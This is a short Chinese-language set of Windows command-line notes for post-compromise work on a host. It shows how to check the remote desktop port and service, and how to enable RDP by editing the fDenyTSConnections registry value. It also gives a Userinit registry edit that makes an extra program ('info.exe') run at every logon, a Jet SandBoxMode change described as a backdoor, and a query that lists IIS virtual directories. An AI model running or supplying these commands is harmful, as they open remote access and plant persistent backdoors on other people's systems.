1.查看3389端口,很多变态管理员会修改为其它的:
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber 这条命令是查看远程桌面连接所开的端口是多少 一般默认显示是0xd3d 也就是3389
2.查看3389的svchost的进程的pid,这样可以结合netstat -ano来看3389的监听端口 【目的与1类似】
tasklist /svc
然后找如下(则远程进程号为1348):
svchost.exe 1348 DcomLaunch, TermService
3.查看是否允许远程连接,也就是“我的电脑”属性的“远程”里面,勾上没有
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections
如是0x0,则可以连接,考虑是否有tcp过滤或者防火墙了,为0x1,则需要修改为0
REG add HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /d 0 /t REG_DWORD /f
4.其它:
查看远程终端服务启动没有:
net start 命令后,找“Terminal Services”,有则服务是启动的
===================
注意:Terminal" "Server 中间有空格,所以加“”
另外来一个reg add命令增加字符串的,如:
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "C:\WINDOWS\system32\userinit.exe,info.exe," /t REG_SZ /f
启用沙盒(作为后门)
reg add "HKEY_LOCAL_MACHINE\SoftWare\Microsoft\Jet\4.0\Engine" /v SandBoxMode /d 0 /t REG_DWORD /f
命令行/控制台通过dos命令查看虚拟目录:
reg query "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots" /v /